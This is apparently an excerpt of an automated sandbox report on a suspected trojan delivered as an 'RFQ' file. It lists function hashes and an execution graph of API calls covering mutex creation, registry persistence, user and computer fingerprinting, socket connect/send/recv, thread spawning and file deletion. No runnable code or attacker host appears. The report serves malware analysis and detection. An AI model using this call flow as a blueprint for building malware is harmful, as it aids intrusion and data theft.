                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c48a1465f7f8ab630eb6e96ac904e97e5be31e2f3d12ac43e48f70e0bb08733a
                            • Instruction ID: 37a52fb18b0657105a210430782e06418b11bc9df9784f112ad97990ae05216f
                            • Opcode Fuzzy Hash: c48a1465f7f8ab630eb6e96ac904e97e5be31e2f3d12ac43e48f70e0bb08733a
                            • Instruction Fuzzy Hash: D3E11574E002198FDB14CFA9C590AAEFBF2FB88305F248169D915AB356D735AD41CFA0
                            Function 05BDDC48 Relevance: .3, Instructions: 308COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 646c32e823f82f7d4b93eeb1475762c9b3bb1d3075fd70e9a3a6d032a288ccc9
                            • Instruction ID: 505f5fb4561c0bae1c090eb0f3a02e4b4c4ece344c08f07dd51dbe623009f097
                            • Opcode Fuzzy Hash: 646c32e823f82f7d4b93eeb1475762c9b3bb1d3075fd70e9a3a6d032a288ccc9
                            • Instruction Fuzzy Hash: 27C13B34700A058FDB28DF29C885BAAF3E6FF85704F1485A9D556CB2A0EB75F841CB61
                            Function 05BD4AC0 Relevance: .3, Instructions: 303COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 608c6dac62999976b0315a8120049f93e0c4609fafe31f16f69e10efc145b324
                            • Instruction ID: a071cf84a21979cbd90b24e7f0602fd61a092c8cb770134565eee401a7a1cfb8
                            • Opcode Fuzzy Hash: 608c6dac62999976b0315a8120049f93e0c4609fafe31f16f69e10efc145b324
                            • Instruction Fuzzy Hash: F6A16170B042569FEB49FBB4842437F63A7BFC9240F288578D04ADB384DE799D4287A5
                            Function 05BDB8A8 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$@$B$B
                            • API String ID: 0-685577651
                            • Opcode ID: 219d4f2e776be13384413b91a2ed97ef9979bcda2d756b2e5d2d60f949d65135
                            • Instruction ID: 2b1d9fedb159d95013dc8da011687fa50a634bc169e3fc6cae17f30f51a0b6e3
                            • Opcode Fuzzy Hash: 219d4f2e776be13384413b91a2ed97ef9979bcda2d756b2e5d2d60f949d65135
                            • Instruction Fuzzy Hash: AA519F757046058FCB15DF68C48496AF7F6FF8932072585AAD41ACB360EB35EC46CBA0
                            Function 05BDB897 Relevance: 5.1, Strings: 4, Instructions: 83COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$@$B$B
                            • API String ID: 0-685577651
                            • Opcode ID: 052d5b067b600d099e63ca50cc4f30c0e4ce8000c8fb05c05e8bcc0096526971
                            • Instruction ID: 3830c1b479de3b1a5a0503c2373955bfb64a1a6b86ca603eb902bc13a99261a7
                            • Opcode Fuzzy Hash: 052d5b067b600d099e63ca50cc4f30c0e4ce8000c8fb05c05e8bcc0096526971
                            • Instruction Fuzzy Hash: 7921AD75A042568FCB14CF69C8849AAFBF6FF8932071640ABD006CB221E734ED44CFA1

                            Execution Graph

                            Execution Coverage:3%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:5.7%
                            Total number of Nodes:1065
                            Total number of Limit Nodes:57
                            execution_graph 46604 41d4e0 46605 41d4f6 _Yarn ___scrt_fastfail 46604->46605 46607 431fa9 21 API calls 46605->46607 46619 41d6f3 46605->46619 46610 41d6a6 ___scrt_fastfail 46607->46610 46608 41d704 46613 41d744 46608->46613 46617 41d770 46608->46617 46621 431fa9 46608->46621 46612 431fa9 21 API calls 46610->46612 46610->46613 46616 41d6ce ___scrt_fastfail 46612->46616 46614 41d73d ___scrt_fastfail 46614->46613 46626 43265f 46614->46626 46616->46613 46618 431fa9 21 API calls 46616->46618 46617->46613 46629 41d484 21 API calls ___scrt_fastfail 46617->46629 46618->46619 46619->46613 46620 41d081 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 46619->46620 46620->46608 46622 431fb3 46621->46622 46623 431fb7 46621->46623 46622->46614 46630 43a89c 46623->46630 46639 43257f 46626->46639 46628 432667 46628->46617 46629->46613 46635 446b0f _strftime 46630->46635 46631 446b4d 46638 445364 20 API calls _abort 46631->46638 46633 446b38 RtlAllocateHeap 46634 431fbc 46633->46634 46633->46635 46634->46614 46635->46631 46635->46633 46637 442210 7 API calls 2 library calls 46635->46637 46637->46635 46638->46634 46640 432598 46639->46640 46644 43258e 46639->46644 46641 431fa9 21 API calls 46640->46641 46640->46644 46642 4325b9 46641->46642 46642->46644 46645 43294a CryptAcquireContextA 46642->46645 46644->46628 46646 432966 46645->46646 46647 43296b CryptGenRandom 46645->46647 46646->46644 46647->46646 46648 432980 CryptReleaseContext 46647->46648 46648->46646 46649 426040 46654 426107 recv 46649->46654 46655 44e8c6 46656 44e8d1 46655->46656 46657 44e8f9 46656->46657 46658 44e8ea 46656->46658 46659 44e908 46657->46659 46677 455583 27 API calls 2 library calls 46657->46677 46676 445364 20 API calls _abort 46658->46676 46664 44b9ce 46659->46664 46662 44e8ef ___scrt_fastfail 46665 44b9e6 46664->46665 46666 44b9db 46664->46666 46668 44b9ee 46665->46668 46674 44b9f7 _strftime 46665->46674 46678 446b0f 46666->46678 46685 446ad5 20 API calls _free 46668->46685 46669 44ba21 RtlReAllocateHeap 46673 44b9e3 46669->46673 46669->46674 46670 44b9fc 46686 445364 20 API calls _abort 46670->46686 46673->46662 46674->46669 46674->46670 46687 442210 7 API calls 2 library calls 46674->46687 46676->46662 46677->46659 46679 446b4d 46678->46679 46683 446b1d _strftime 46678->46683 46689 445364 20 API calls _abort 46679->46689 46681 446b38 RtlAllocateHeap 46682 446b4b 46681->46682 46681->46683 46682->46673 46683->46679 46683->46681 46688 442210 7 API calls 2 library calls 46683->46688 46685->46673 46686->46673 46687->46674 46688->46683 46689->46682 46690 4260a1 46695 42611e send 46690->46695 46696 442a0c 46697 442a2e 46696->46697 46698 442a15 46696->46698 46699 442a1d 46698->46699 46703 442a94 46698->46703 46701 442a25 46701->46699 46714 442d61 22 API calls 2 library calls 46701->46714 46704 442aa0 46703->46704 46705 442a9d 46703->46705 46715 44e1ce GetEnvironmentStringsW 46704->46715 46705->46701 46708 442aad 46724 446ad5 20 API calls _free 46708->46724 46711 442ae2 46711->46701 46712 442ab8 46723 446ad5 20 API calls _free 46712->46723 46714->46697 46716 44e1e2 46715->46716 46717 442aa7 46715->46717 46718 446b0f _strftime 21 API calls 46716->46718 46717->46708 46722 442bb9 26 API calls 3 library calls 46717->46722 46719 44e1f6 _Yarn 46718->46719 46725 446ad5 20 API calls _free 46719->46725 46721 44e210 FreeEnvironmentStringsW 46721->46717 46722->46712 46723->46708 46724->46711 46725->46721 46726 43a9a8 46728 43a9b4 _swprintf ___scrt_is_nonwritable_in_current_image 46726->46728 46727 43a9c2 46744 445364 20 API calls _abort 46727->46744 46728->46727 46732 43a9ec 46728->46732 46730 43a9c7 46745 43a837 26 API calls _Deallocate 46730->46745 46739 444adc EnterCriticalSection 46732->46739 46734 43a9f7 46740 43aa98 46734->46740 46737 43a9d2 __fread_nolock 46739->46734 46742 43aaa6 46740->46742 46741 43aa02 46746 43aa1f LeaveCriticalSection std::_Lockit::~_Lockit 46741->46746 46742->46741 46747 448426 39 API calls 2 library calls 46742->46747 46744->46730 46745->46737 46746->46737 46747->46742 46748 402bcc 46749 402bd7 46748->46749 46750 402bdf 46748->46750 46766 403315 28 API calls 2 library calls 46749->46766 46752 402beb 46750->46752 46756 4015d3 46750->46756 46753 402bdd 46758 43361d 46756->46758 46757 43a89c _Yarn 21 API calls 46757->46758 46758->46757 46759 402be9 46758->46759 46762 43363e std::_Facet_Register 46758->46762 46767 442210 7 API calls 2 library calls 46758->46767 46761 433dfc std::_Facet_Register 46769 437be7 RaiseException 46761->46769 46762->46761 46768 437be7 RaiseException 46762->46768 46764 433e19 46766->46753 46767->46758 46768->46761 46769->46764 46770 4339ce 46771 4339da ___scrt_is_nonwritable_in_current_image 46770->46771 46802 4336c3 46771->46802 46773 4339e1 46774 433b34 46773->46774 46777 433a0b 46773->46777 47102 433b54 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46774->47102 46776 433b3b 47103 4426ce 28 API calls _abort 46776->47103 46787 433a4a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46777->46787 47096 4434e1 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 46777->47096 46779 433b41 47104 442680 28 API calls _abort 46779->47104 46782 433a24 46784 433a2a 46782->46784 47097 443485 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 46782->47097 46783 433b49 46786 433aab 46813 433c6e 46786->46813 46787->46786 47098 43ee04 38 API calls 2 library calls 46787->47098 46796 433acd 46796->46776 46797 433ad1 46796->46797 46798 433ada 46797->46798 47100 442671 28 API calls _abort 46797->47100 47101 433852 13 API calls 2 library calls 46798->47101 46801 433ae2 46801->46784 46803 4336cc 46802->46803 47105 433e1a IsProcessorFeaturePresent 46803->47105 46805 4336d8 47106 4379fe 10 API calls 3 library calls 46805->47106 46807 4336dd 46808 4336e1 46807->46808 47107 44336e 46807->47107 46808->46773 46811 4336f8 46811->46773 47169 436060 46813->47169 46816 433ab1 46817 443432 46816->46817 47171 44ddd9 46817->47171 46819 44343b 46820 433aba 46819->46820 47175 44e0e3 38 API calls 46819->47175 46822 40d767 46820->46822 47177 41bcf3 LoadLibraryA GetProcAddress 46822->47177 46824 40d783 GetModuleFileNameW 47182 40e168 46824->47182 46826 40d79f 47197 401fbd 46826->47197 46829 401fbd 28 API calls 46830 40d7bd 46829->46830 47201 41afd3 46830->47201 46834 40d7cf 47226 401d8c 46834->47226 46836 40d7d8 46837 40d835 46836->46837 46838 40d7eb 46836->46838 47232 401d64 46837->47232 47483 40e986 111 API calls 46838->47483 46841 40d7fd 46843 401d64 28 API calls 46841->46843 46842 40d845 46844 401d64 28 API calls 46842->46844 46847 40d809 46843->46847 46845 40d864 46844->46845 47237 404cbf 46845->47237 47484 40e937 68 API calls 46847->47484 46848 40d873 47241 405ce6 46848->47241 46851 40d87f 47244 401eef 46851->47244 46852 40d824 47485 40e155 68 API calls 46852->47485 46855 40d88b 47248 401eea 46855->47248 46857 40d894 46859 401eea 26 API calls 46857->46859 46858 401eea 26 API calls 46860 40dc9f 46858->46860 46861 40d89d 46859->46861 47099 433ca4 GetModuleHandleW 46860->47099 46862 401d64 28 API calls 46861->46862 46863 40d8a6 46862->46863 47252 401ebd 46863->47252 46865 40d8b1 46866 401d64 28 API calls 46865->46866 46867 40d8ca 46866->46867 46868 401d64 28 API calls 46867->46868 46870 40d8e5 46868->46870 46869 40d946 46871 401d64 28 API calls 46869->46871 46886 40e134 46869->46886 46870->46869 47486 4085b4 46870->47486 46878 40d95d 46871->46878 46873 40d912 46874 401eef 26 API calls 46873->46874 46875 40d91e 46874->46875 46876 401eea 26 API calls 46875->46876 46879 40d927 46876->46879 46877 40d9a4 47256 40bed7 46877->47256 46878->46877 46883 4124b7 3 API calls 46878->46883 47490 4124b7 RegOpenKeyExA 46879->47490 46881 40d9aa 46882 40d82d 46881->46882 47259 41a473 46881->47259 46882->46858 46888 40d988 46883->46888 47566 412902 30 API calls 46886->47566 46887 40d9c5 46890 40da18 46887->46890 47276 40697b 46887->47276 46888->46877 47493 412902 30 API calls 46888->47493 46891 401d64 28 API calls 46890->46891 46894 40da21 46891->46894 46903 40da32 46894->46903 46904 40da2d 46894->46904 46896 40e14a 47567 4112b5 64 API calls ___scrt_fastfail 46896->47567 46897 40d9e4 47494 40699d 30 API calls 46897->47494 46898 40d9ee 46902 401d64 28 API calls 46898->46902 46911 40d9f7 46902->46911 46908 401d64 28 API calls 46903->46908 47497 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 46904->47497 46905 40d9e9 47495 4064d0 97 API calls 46905->47495 46909 40da3b 46908->46909 47280 41ae18 46909->47280 46911->46890 46913 40da13 46911->46913 46912 40da46 47284 401e18 46912->47284 47496 4064d0 97 API calls 46913->47496 46915 40da51 47288 401e13 46915->47288 46918 40da5a 46919 401d64 28 API calls 46918->46919 46920 40da63 46919->46920 46921 401d64 28 API calls 46920->46921 46922 40da7d 46921->46922 46923 401d64 28 API calls 46922->46923 46924 40da97 46923->46924 46925 401d64 28 API calls 46924->46925 46927 40dab0 46925->46927 46926 40db1d 46929 40db2c 46926->46929 46935 40dcaa ___scrt_fastfail 46926->46935 46927->46926 46928 401d64 28 API calls 46927->46928 46933 40dac5 _wcslen 46928->46933 46930 40db35 46929->46930 46958 40dbb1 ___scrt_fastfail 46929->46958 46931 401d64 28 API calls 46930->46931 46932 40db3e 46931->46932 46934 401d64 28 API calls 46932->46934 46933->46926 46937 401d64 28 API calls 46933->46937 46936 40db50 46934->46936 47557 41265d RegOpenKeyExA RegQueryValueExA RegCloseKey 46935->47557 46940 401d64 28 API calls 46936->46940 46938 40dae0 46937->46938 46942 401d64 28 API calls 46938->46942 46941 40db62 46940->46941 46945 401d64 28 API calls 46941->46945 46943 40daf5 46942->46943 47498 40c89e 46943->47498 46944 40dcef 46946 401d64 28 API calls 46944->46946 46948 40db8b 46945->46948 46949 40dd16 46946->46949 46954 401d64 28 API calls 46948->46954 47302 401f66 46949->47302 46951 401e18 26 API calls 46953 40db14 46951->46953 46956 401e13 26 API calls 46953->46956 46957 40db9c 46954->46957 46955 40dd25 47306 4126d2 RegCreateKeyA 46955->47306 46956->46926 47555 40bc67 45 API calls _wcslen 46957->47555 47292 4128a2 46958->47292 46962 40dbac 46962->46958 46964 40dc45 ctype 46967 401d64 28 API calls 46964->46967 46965 401d64 28 API calls 46966 40dd47 46965->46966 47312 43a5f7 46966->47312 46968 40dc5c 46967->46968 46968->46944 46971 40dc70 46968->46971 46974 401d64 28 API calls 46971->46974 46972 40dd5e 47558 41bec0 86 API calls ___scrt_fastfail 46972->47558 46973 40dd81 46977 401f66 28 API calls 46973->46977 46975 40dc7e 46974->46975 46978 41ae18 28 API calls 46975->46978 46980 40dd96 46977->46980 46981 40dc87 46978->46981 46979 40dd65 CreateThread 46979->46973 47955 41c97f 10 API calls 46979->47955 46982 401f66 28 API calls 46980->46982 47556 40e219 109 API calls 46981->47556 46984 40dda5 46982->46984 47316 41a696 46984->47316 46985 40dc8c 46985->46944 46987 40dc93 46985->46987 46987->46882 46989 401d64 28 API calls 46990 40ddb6 46989->46990 46991 401d64 28 API calls 46990->46991 46992 40ddcb 46991->46992 46993 401d64 28 API calls 46992->46993 46994 40ddeb 46993->46994 46995 43a5f7 _strftime 42 API calls 46994->46995 46996 40ddf8 46995->46996 46997 401d64 28 API calls 46996->46997 46998 40de03 46997->46998 46999 401d64 28 API calls 46998->46999 47000 40de14 46999->47000 47001 401d64 28 API calls 47000->47001 47002 40de29 47001->47002 47003 401d64 28 API calls 47002->47003 47004 40de3a 47003->47004 47005 40de41 StrToIntA 47004->47005 47340 409517 47005->47340 47008 401d64 28 API calls 47009 40de5c 47008->47009 47010 40dea1 47009->47010 47011 40de68 47009->47011 47014 401d64 28 API calls 47010->47014 47559 43361d 22 API calls 3 library calls 47011->47559 47013 40de71 47015 401d64 28 API calls 47013->47015 47016 40deb1 47014->47016 47017 40de84 47015->47017 47019 40def9 47016->47019 47020 40debd 47016->47020 47018 40de8b CreateThread 47017->47018 47018->47010 47958 419138 102 API calls 2 library calls 47018->47958 47021 401d64 28 API calls 47019->47021 47560 43361d 22 API calls 3 library calls 47020->47560 47023 40df02 47021->47023 47027 40df6c 47023->47027 47028 40df0e 47023->47028 47024 40dec6 47025 401d64 28 API calls 47024->47025 47026 40ded8 47025->47026 47029 40dedf CreateThread 47026->47029 47030 401d64 28 API calls 47027->47030 47031 401d64 28 API calls 47028->47031 47029->47019 47957 419138 102 API calls 2 library calls 47029->47957 47032 40df75 47030->47032 47033 40df1e 47031->47033 47034 40df81 47032->47034 47035 40dfba 47032->47035 47036 401d64 28 API calls 47033->47036 47038 401d64 28 API calls 47034->47038 47365 41a7b2 GetComputerNameExW GetUserNameW 47035->47365 47039 40df33 47036->47039 47041 40df8a 47038->47041 47561 40c854 31 API calls 47039->47561 47045 401d64 28 API calls 47041->47045 47042 401e18 26 API calls 47044 40dfce 47042->47044 47047 401e13 26 API calls 47044->47047 47048 40df9f 47045->47048 47046 40df46 47049 401e18 26 API calls 47046->47049 47050 40dfd7 47047->47050 47059 43a5f7 _strftime 42 API calls 47048->47059 47051 40df52 47049->47051 47052 40dfe0 SetProcessDEPPolicy 47050->47052 47053 40dfe3 CreateThread 47050->47053 47056 401e13 26 API calls 47051->47056 47052->47053 47054 40e004 47053->47054 47055 40dff8 CreateThread 47053->47055 47927 40e54f 47053->47927 47057 40e019 47054->47057 47058 40e00d CreateThread 47054->47058 47055->47054 47959 410f36 136 API calls 47055->47959 47060 40df5b CreateThread 47056->47060 47062 40e073 47057->47062 47064 401f66 28 API calls 47057->47064 47058->47057 47954 411524 38 API calls ___scrt_fastfail 47058->47954 47061 40dfac 47059->47061 47060->47027 47956 40196b 49 API calls _strftime 47060->47956 47562 40b95c 7 API calls 47061->47562 47376 41246e RegOpenKeyExA 47062->47376 47065 40e046 47064->47065 47563 404c9e 28 API calls 47065->47563 47069 40e053 47071 401f66 28 API calls 47069->47071 47070 40e12a 47388 40cbac 47070->47388 47074 40e062 47071->47074 47073 41ae18 28 API calls 47076 40e0a4 47073->47076 47077 41a696 79 API calls 47074->47077 47379 412584 RegOpenKeyExW 47076->47379 47079 40e067 47077->47079 47080 401eea 26 API calls 47079->47080 47080->47062 47083 401e13 26 API calls 47086 40e0c5 47083->47086 47084 40e0ed DeleteFileW 47085 40e0f4 47084->47085 47084->47086 47088 41ae18 28 API calls 47085->47088 47086->47084 47086->47085 47087 40e0db Sleep 47086->47087 47564 401e07 47087->47564 47090 40e104 47088->47090 47384 41297a RegOpenKeyExW 47090->47384 47092 40e117 47093 401e13 26 API calls 47092->47093 47094 40e121 47093->47094 47095 401e13 26 API calls 47094->47095 47095->47070 47096->46782 47097->46787 47098->46786 47099->46796 47100->46798 47101->46801 47102->46776 47103->46779 47104->46783 47105->46805 47106->46807 47111 44e959 47107->47111 47110 437a27 8 API calls 3 library calls 47110->46808 47114 44e976 47111->47114 47115 44e972 47111->47115 47113 4336ea 47113->46811 47113->47110 47114->47115 47117 4489bd 47114->47117 47129 433d3c 5 API calls ___raise_securityfailure 47115->47129 47118 4489c9 ___scrt_is_nonwritable_in_current_image 47117->47118 47130 444adc EnterCriticalSection 47118->47130 47120 4489d0 47131 44ef74 47120->47131 47122 4489df 47123 4489ee 47122->47123 47144 448851 29 API calls 47122->47144 47146 448a0a LeaveCriticalSection std::_Lockit::~_Lockit 47123->47146 47126 4489ff __fread_nolock 47126->47114 47127 4489e9 47145 448907 GetStdHandle GetFileType 47127->47145 47129->47113 47130->47120 47132 44ef80 ___scrt_is_nonwritable_in_current_image 47131->47132 47133 44efa4 47132->47133 47134 44ef8d 47132->47134 47147 444adc EnterCriticalSection 47133->47147 47155 445364 20 API calls _abort 47134->47155 47137 44ef92 47156 43a837 26 API calls _Deallocate 47137->47156 47139 44ef9c __fread_nolock 47139->47122 47140 44efdc 47157 44f003 LeaveCriticalSection std::_Lockit::~_Lockit 47140->47157 47142 44efb0 47142->47140 47148 44eec5 47142->47148 47144->47127 47145->47123 47146->47126 47147->47142 47158 448716 47148->47158 47150 44eee4 47166 446ad5 20 API calls _free 47150->47166 47152 44ef36 47152->47142 47154 44eed7 47154->47150 47165 44773e 11 API calls 2 library calls 47154->47165 47155->47137 47156->47139 47157->47139 47159 448723 _strftime 47158->47159 47160 448763 47159->47160 47161 44874e RtlAllocateHeap 47159->47161 47167 442210 7 API calls 2 library calls 47159->47167 47168 445364 20 API calls _abort 47160->47168 47161->47159 47162 448761 47161->47162 47162->47154 47165->47154 47166->47152 47167->47159 47168->47162 47170 433c81 GetStartupInfoW 47169->47170 47170->46816 47172 44dde2 47171->47172 47174 44ddeb 47171->47174 47176 44dcd8 51 API calls 4 library calls 47172->47176 47174->46819 47175->46819 47176->47174 47178 41bd32 LoadLibraryA GetProcAddress 47177->47178 47179 41bd22 GetModuleHandleA GetProcAddress 47177->47179 47180 41bd5b 32 API calls 47178->47180 47181 41bd4b LoadLibraryA GetProcAddress 47178->47181 47179->47178 47180->46824 47181->47180 47568 41a64f FindResourceA 47182->47568 47185 43a89c _Yarn 21 API calls 47186 40e192 _Yarn 47185->47186 47571 401f86 47186->47571 47189 401eef 26 API calls 47190 40e1b8 47189->47190 47191 401eea 26 API calls 47190->47191 47192 40e1c1 47191->47192 47193 43a89c _Yarn 21 API calls 47192->47193 47194 40e1d2 _Yarn 47193->47194 47575 406052 47194->47575 47196 40e205 47196->46826 47198 401fcc 47197->47198 47583 402501 47198->47583 47200 401fea 47200->46829 47202 41afe6 47201->47202 47205 41b058 47202->47205 47214 401eef 26 API calls 47202->47214 47217 401eea 26 API calls 47202->47217 47221 41b056 47202->47221 47588 403b60 28 API calls 47202->47588 47589 41bfb9 28 API calls 47202->47589 47203 401eea 26 API calls 47204 41b088 47203->47204 47206 401eea 26 API calls 47204->47206 47590 403b60 28 API calls 47205->47590 47209 41b090 47206->47209 47211 401eea 26 API calls 47209->47211 47210 41b064 47213 401eef 26 API calls 47210->47213 47212 40d7c6 47211->47212 47222 40e8bd 47212->47222 47215 41b06d 47213->47215 47214->47202 47216 401eea 26 API calls 47215->47216 47218 41b075 47216->47218 47217->47202 47591 41bfb9 28 API calls 47218->47591 47221->47203 47223 40e8ca 47222->47223 47225 40e8da 47223->47225 47592 40200a 26 API calls 47223->47592 47225->46834 47227 40200a 47226->47227 47231 40203a 47227->47231 47593 402654 26 API calls 47227->47593 47229 40202b 47594 4026ba 26 API calls _Deallocate 47229->47594 47231->46836 47233 401d6c 47232->47233 47236 401d74 47233->47236 47595 401fff 28 API calls 47233->47595 47236->46842 47238 404ccb 47237->47238 47596 402e78 47238->47596 47240 404cee 47240->46848 47605 404bc4 47241->47605 47243 405cf4 47243->46851 47245 401efe 47244->47245 47247 401f0a 47245->47247 47614 4021b9 26 API calls 47245->47614 47247->46855 47250 4021b9 47248->47250 47249 4021e8 47249->46857 47250->47249 47615 40262e 26 API calls _Deallocate 47250->47615 47254 401ec9 47252->47254 47253 401ee4 47253->46865 47254->47253 47255 402325 28 API calls 47254->47255 47255->47253 47616 401e8f 47256->47616 47258 40bee1 CreateMutexA GetLastError 47258->46881 47618 41b16b 47259->47618 47264 401eef 26 API calls 47265 41a4af 47264->47265 47266 401eea 26 API calls 47265->47266 47267 41a4b7 47266->47267 47268 41a50a 47267->47268 47269 412513 31 API calls 47267->47269 47268->46887 47270 41a4dd 47269->47270 47271 41a4e8 StrToIntA 47270->47271 47272 41a4ff 47271->47272 47273 41a4f6 47271->47273 47275 401eea 26 API calls 47272->47275 47626 41c112 28 API calls 47273->47626 47275->47268 47277 40698f 47276->47277 47278 4124b7 3 API calls 47277->47278 47279 406996 47278->47279 47279->46897 47279->46898 47281 41ae2c 47280->47281 47627 40b027 47281->47627 47283 41ae34 47283->46912 47285 401e27 47284->47285 47286 401e33 47285->47286 47636 402121 26 API calls 47285->47636 47286->46915 47290 402121 47288->47290 47289 402150 47289->46918 47290->47289 47637 402718 26 API calls _Deallocate 47290->47637 47293 4128c0 47292->47293 47294 406052 28 API calls 47293->47294 47295 4128d5 47294->47295 47296 401fbd 28 API calls 47295->47296 47297 4128e5 47296->47297 47298 4126d2 29 API calls 47297->47298 47299 4128ef 47298->47299 47300 401eea 26 API calls 47299->47300 47301 4128fc 47300->47301 47301->46964 47303 401f6e 47302->47303 47638 402301 47303->47638 47307 412722 47306->47307 47309 4126eb 47306->47309 47308 401eea 26 API calls 47307->47308 47310 40dd3b 47308->47310 47311 4126fd RegSetValueExA RegCloseKey 47309->47311 47310->46965 47311->47307 47313 43a610 _strftime 47312->47313 47642 43994e 47313->47642 47317 41a747 47316->47317 47318 41a6ac GetLocalTime 47316->47318 47320 401eea 26 API calls 47317->47320 47319 404cbf 28 API calls 47318->47319 47321 41a6ee 47319->47321 47322 41a74f 47320->47322 47323 405ce6 28 API calls 47321->47323 47324 401eea 26 API calls 47322->47324 47325 41a6fa 47323->47325 47326 40ddaa 47324->47326 47676 4027cb 47325->47676 47326->46989 47328 41a706 47329 405ce6 28 API calls 47328->47329 47330 41a712 47329->47330 47679 406478 76 API calls 47330->47679 47332 41a720 47333 401eea 26 API calls 47332->47333 47334 41a72c 47333->47334 47335 401eea 26 API calls 47334->47335 47336 41a735 47335->47336 47337 401eea 26 API calls 47336->47337 47338 41a73e 47337->47338 47339 401eea 26 API calls 47338->47339 47339->47317 47341 409536 _wcslen 47340->47341 47342 409541 47341->47342 47343 409558 47341->47343 47344 40c89e 31 API calls 47342->47344 47345 40c89e 31 API calls 47343->47345 47346 409549 47344->47346 47347 409560 47345->47347 47348 401e18 26 API calls 47346->47348 47349 401e18 26 API calls 47347->47349 47350 409553 47348->47350 47351 40956e 47349->47351 47353 401e13 26 API calls 47350->47353 47352 401e13 26 API calls 47351->47352 47354 409576 47352->47354 47355 4095ad 47353->47355 47699 40856b 28 API calls 47354->47699 47684 409837 47355->47684 47358 409588 47700 4028cf 47358->47700 47361 409593 47362 401e18 26 API calls 47361->47362 47363 40959d 47362->47363 47364 401e13 26 API calls 47363->47364 47364->47350 47719 403b40 47365->47719 47369 41a80d 47370 4028cf 28 API calls 47369->47370 47371 41a817 47370->47371 47372 401e13 26 API calls 47371->47372 47373 41a820 47372->47373 47374 401e13 26 API calls 47373->47374 47375 40dfc3 47374->47375 47375->47042 47377 40e08b 47376->47377 47378 41248f RegQueryValueExA RegCloseKey 47376->47378 47377->47070 47377->47073 47378->47377 47380 4125b0 RegQueryValueExW RegCloseKey 47379->47380 47381 4125dd 47379->47381 47380->47381 47382 403b40 28 API calls 47381->47382 47383 40e0ba 47382->47383 47383->47083 47385 412992 RegDeleteValueW 47384->47385 47386 4129a6 47384->47386 47385->47386 47387 4129a2 47385->47387 47386->47092 47387->47092 47389 40cbc5 47388->47389 47390 41246e 3 API calls 47389->47390 47391 40cbcc 47390->47391 47392 40cbeb 47391->47392 47752 401602 47391->47752 47396 413fd4 47392->47396 47394 40cbd9 47755 4127d5 RegCreateKeyA 47394->47755 47397 413feb 47396->47397 47772 41aa83 47397->47772 47399 413ff6 47400 401d64 28 API calls 47399->47400 47401 41400f 47400->47401 47402 43a5f7 _strftime 42 API calls 47401->47402 47403 41401c 47402->47403 47404 414021 Sleep 47403->47404 47405 41402e 47403->47405 47404->47405 47406 401f66 28 API calls 47405->47406 47407 41403d 47406->47407 47408 401d64 28 API calls 47407->47408 47409 41404b 47408->47409 47410 401fbd 28 API calls 47409->47410 47411 414053 47410->47411 47412 41afd3 28 API calls 47411->47412 47413 41405b 47412->47413 47776 404262 WSAStartup 47413->47776 47415 414065 47416 401d64 28 API calls 47415->47416 47417 41406e 47416->47417 47418 401d64 28 API calls 47417->47418 47443 4140ed 47417->47443 47419 414087 47418->47419 47420 401d64 28 API calls 47419->47420 47422 414098 47420->47422 47421 401fbd 28 API calls 47421->47443 47424 401d64 28 API calls 47422->47424 47423 41afd3 28 API calls 47423->47443 47425 4140a9 47424->47425 47428 401d64 28 API calls 47425->47428 47426 401d64 28 API calls 47426->47443 47427 4085b4 28 API calls 47427->47443 47429 4140ba 47428->47429 47431 401d64 28 API calls 47429->47431 47430 401eef 26 API calls 47430->47443 47432 4140cb 47431->47432 47434 401d64 28 API calls 47432->47434 47433 401eea 26 API calls 47433->47443 47435 4140dd 47434->47435 47879 404101 87 API calls 47435->47879 47438 414244 WSAGetLastError 47880 41bc86 30 API calls 47438->47880 47443->47421 47443->47423 47443->47426 47443->47427 47443->47430 47443->47433 47443->47438 47445 41a696 79 API calls 47443->47445 47447 404cbf 28 API calls 47443->47447 47448 401d8c 26 API calls 47443->47448 47449 43a5f7 _strftime 42 API calls 47443->47449 47450 405ce6 28 API calls 47443->47450 47452 4027cb 28 API calls 47443->47452 47453 401f66 28 API calls 47443->47453 47458 412513 31 API calls 47443->47458 47462 41446f 47443->47462 47777 413f9a 47443->47777 47783 4041f1 47443->47783 47790 404915 47443->47790 47805 40428c connect 47443->47805 47865 4047eb WaitForSingleObject 47443->47865 47881 404c9e 28 API calls 47443->47881 47882 413683 50 API calls 47443->47882 47883 4082dc 28 API calls 47443->47883 47884 440c61 26 API calls 47443->47884 47885 41265d RegOpenKeyExA RegQueryValueExA RegCloseKey 47443->47885 47445->47443 47447->47443 47448->47443 